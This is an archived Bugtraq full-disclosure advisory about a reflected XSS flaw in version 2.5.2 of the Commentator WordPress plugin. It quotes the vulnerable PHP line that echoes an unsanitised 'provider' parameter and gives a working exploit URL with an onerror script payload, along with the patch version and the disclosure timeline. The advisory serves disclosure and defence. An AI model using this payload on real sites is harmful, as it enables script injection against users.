| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <56965BE4.40408@gmail.com> Date: Wed, 13 Jan 2016 19:45:00 +0530 From: Rahul Pratap Singh <techno.rps@...il.com> To: bugtraq@...urityfocus.com Subject: Commentator Wordpress Plugin 2.5.2 XSS Vulnerability ## Full Disclosure #Product : Commentator Wordpress Plugin #Exploit Author : Rahul Pratap Singh #Version : 2.5.2 #Home page Link : http://codecanyon.net/item/commentator-wordpress-plugin/6425752 #Website : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date : 13/Jan/2016 XSS Vulnerability: ---------------------------------------- Description: ---------------------------------------- "provider" parameter is not sanitized that leads to Reflected XSS. ---------------------------------------- Vulnerable Code: ---------------------------------------- file: commentator.php line:441 $provider_name = $_REQUEST["provider"]; line:544 <div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>"> ---------------------------------------- Exploit: ---------------------------------------- /wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)> ---------------------------------------- POC: ---------------------------------------- https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png Fix: Update to 2.5.3 Disclosure Timeline: reported to vendor : 9/1/2016 vendor response : 11/1/2016 vendor acknowledged : 11/1/2016 vendor deployed a patch: 11/1/2016 Pub ref: http://codecanyon.net/item/commentator-wordpress-plugin/6425752 https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes) Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
Powered by blists - more mailing lists